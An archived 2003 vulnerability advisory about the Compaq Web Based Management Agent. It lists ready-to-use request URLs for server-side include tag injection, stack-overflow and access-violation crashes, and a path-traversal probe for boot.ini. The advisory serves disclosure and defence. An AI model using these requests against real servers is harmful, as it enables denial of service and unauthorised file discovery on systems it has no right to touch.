compaq.txt

compaq.txt: Posted Jun 30, 2003; Authored by Ian Vitek; The Compaq Web Based Management Agent is vulnerable to server side injection, stack overflows, access violations, and creation of script objects.; tags | exploit, web, overflow; SHA-256 | 1ac95b0059ba56c29c2e4bf897039346c99782f06b42f3096586c5b7e9ba6ee1; Download | Favorite | View

compaq.txt

SSI vulnerability in Compaq Web Based Management Agent
======================================================

Type of vulnerabilities:
  Server Side Include injection. Exploitable.
  Stack overflows and access violations. Exploitable?
  Creation of script objects. Exploitable?

Affected Software:  Compaq Web Based Management Agent
Verified Platforms:  Windows

Background and problem description
==================================
Bashis (bash at wcd.se) has found several vulnerabilities
in Compaq Web Based Management Agent. This Agent runs on
TCP port 2301 (HTTP) or 2381 (HTTPS).
The agent uses "tags" to run funktions at the server side.
To list all tags:
http://IP:2301/<!.TableDisplayTags> 

To crash the agent:
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!>
Stack overflow (0xc00000fd), Address: 0x10039869

This crashes the agent too:
http://IP:2301/<!.StringRedirecturl>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x10039869

The cause could be an endless loop (the result
contains a tag to display an URL, and the result
contains a tag to display an URL, and the result...)

More strange stack overflows:
http://IP:2301/<!.ObjectIsapiECB>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Many tags take input that seems vulnerable:
http://IP:2301/<!.StringIsapiECB=lpszPathInfo>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Netcat following:
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Access violation (0xc0000005), Address: 0x100368a5

Check file existens. (with a nice 'input box')
http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It looks like you could create script objects.
Check the tags with <!.TableDisplayTags>. Some of the
CreateObject tags has the parameter 'script'.
I don't know if it could be done though.

Is this just another remote DoS?

I have mailed HP (security-alert@hp.com) and got an automated
response 28/5 2003.

If someone want to forward this mail they may do so.

To all of my friends; See you in Vegas!
The Swedes are comming.
//Ian Vitek

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

compaq.txt

compaq.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

compaq.txt

Share This

compaq.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems